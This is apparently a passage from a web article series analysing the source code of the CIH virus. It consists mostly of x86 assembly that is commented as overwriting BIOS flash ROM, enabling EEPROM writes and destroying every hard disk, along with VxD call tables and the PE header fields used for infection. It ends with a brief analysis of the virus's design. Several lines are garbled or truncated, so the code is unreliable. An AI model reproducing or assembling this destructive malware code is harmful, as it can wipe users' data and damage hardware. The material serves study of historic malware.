Home  >  Article  >  Backend Development  >  Analysis of virus program source code examples-CIH virus[5]

Analysis of virus program source code examples-CIH virus[5]

黄舟
黄舟Original
2017-01-17 11:21:471890browse

Analysis of virus program source code examples-CIH virus[5]

push ecx
 loop $
 
 ;Destroy the additional 000E0000 - 000E007F segment ROM data in the BIOS, a total of 80h bytes
 xor ah, ah
 mov [eax], al
 
 xchg ecx, eax
 loop $ # pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h

loop $

; Destroy the 000FE000 - 000FE07F segment data of the BIOS, 80h bytes in total
mov ah, 0e0h
mov [eax], al
[esi], 100ch
call esi

; Destroy all hard drives
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2CH
Push 0c0001000H
MOV BH, 08h
Push ebx
Push ECX
Push ECX ## Push Ecx ## Push 40000501h
Push Ecx

# push ecx
 
mov esi, esp
sub esp, 0ach
 
  LoopOfKillHardDisk:
int 20h
dd 00100004h
 
 cmp word ptr [esi+06h], 0017h
je KillNextDataSection
 
 ChangeNextHardDisk:
 inc byte ptr [esi+4dh]
 
 jmp LoopOfKillHardDisk
 
 ;Destroy the next area
 KillNextDataSection:
 add dword ptr [esi+10h], ebx  
 mov byte ptr [esi+4dh], FirstKillHardDiskNumber   
  
 jmp LoopOfKillHardDisk
 
 Enable EEPROM to write information
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al
ret

IOForEEPROM:
@10 = IOForEEPROM

xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
in al, dx

BooleanCalculateCode = $
or al , 44h

 
 ret BCSPath- IFSMgr_RemoveFileSystemApiHook
 db IFSMgr_Ring0_FileIO-UniToBCSPath;The difference between the address of each Vxd call instruction
 
 VxdCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h;The call number of Vxd
​VxdCallTableSize = ($-VxdCallIDTable)/04h; Program The number of calls using Vxd
 
 ;Definition of virus version and copyright information
 VirusVersionCopyright db 'CIH v';Identification of CIH virus
 db MajorVirusVersion+'0';Main version number
 db '.'
 db MinorVirusVersion+'0' ;Minor version number
 db ' TATUNG' ;Author name
 
  ;Virus size
 VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h)
  + NumberOfSections *SizeOfVirusCodeSectionTable(08h)
+ SizeOfTheFirstVirusCodeSectionTable(04h)

; Dynamic data definition
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress ; Virus data starting address

OnBusy db 0; "Busy" flag
FileModificationTime dd ? File modification time
FileNameBufferSize dup(?) FileNameBufferSize dup(?) DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ? ; Block number
TimeDateStamp dd ? ; File time
SymbolsPointer dd ?
NumberOfSymbols dd ? ; Number of symbols in the symbol table
SizeOfOptionalHeader dw ? ;The length of the optional header
_Characteristics dw ? ;Character set flag
Magic dw ? ;Flag word (always 010bh)
LinkerVersion dw ? ;Linker version number
SizeOfCode dd ? ; Code segment size
SizeOfInitializedData dd ? Initialized data block size
SizeOfUninitializedData dd ? Uninitialized data block size
AddressOfEntryPoint dd ? Program start RVA
BaseOfCode dd ? ; Code Section start RVA
 BaseOfData dd ? ;Data section start RVA
 ImageBase dd ? ;Load base address RVA
 
 @9 = $
 SectionAlignment dd ? ;Block alignment
FileAlignment dd ? ;File block alignment
 OperatingSystemVersion dd ? ;Required operating system version number
 ImageVersion dd ? ;User-defined version number
 SubsystemVersion dd ? ;Required subsystem version number
 Reserved dd ? ; Reserved
SizeOfImage dd ? ; Total length of each part of the file
SizeOfHeaders dd ? ; File header size
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer
SizeOfImageHeaderToWrite = 04h
StartOfSectionTable = @9
 SectionName = StartOfSectionTable ;Block name
VirtualSize = StartOfSectionTable+08h ;Section real length
VirtualAddress = StartOfSectionTable+0ch ;Block RVA
SizeOfRawData = StartOfSectionTable+10h ;Block physical length
PointerToRawData = StartOfSectionTable+14h ; Block physical offset
PointerToRelocations = StartOfSectionTable+18h ; Relocation offset
PointerToLineNumbers = StartOfSectionTable+1ch ; Line number table offset
NumberOfRelocations = StartOfSectionTable+20h ; Number of relocation items
NumberOfLinenNmbers = StartOfSectionTable+22h ; Number of line number tables
Characteristics = StartOfSectionTable+24h ; Block attributes
SizeOfScetionTable = Characteristics+04h-SectionName ; Length of each block table item
## ;Amount of memory required by the virus
VirusNeedBaseMemory = $
VirusNeedBaseMemory = $
 
VirusTotalNeedMemory = @9
 ; + NumberOfSections(??)*SizeOfScetionTable(28h)
 ; + SizeOfVirusCodeSectionTableEndMark(04h)
 ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
 ; ## From the above code analysis process, we can see that the CIH virus has a clear structure and distinct layers. The backbone structure of this virus program is very similar to that of the DOS virus, except that the details of the virus are processed according to the win95 method, and all system calls are made using Vxd. This makes the virus program more low-level, more efficient, and easier to program. Compared with using API functions under Windows, there is no need to consider the complex relocation process of the virus itself; compared with using interrupts, it can better prevent the tracking of the program. analyze.

The CIH virus has two innovations. First, when the virus infects, it searches for the blank areas between the blocks of the infected file, and writes the virus's own various data structures and codes into them (if the blank area is not enough, It is not contagious, which is one of the reasons why some files will not be infected); secondly, the virus can damage the computer hardware when it attacks, not only burning the Flash Memory, but also destroying the hard disk.

For security reasons, we have not given a detailed analysis of this part of the code that causes viruses to attack and damage hardware.




The above is the content of virus program source code example analysis-CIH virus [5]. For more related content, please pay attention to the PHP Chinese website (www.php.cn)!


Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn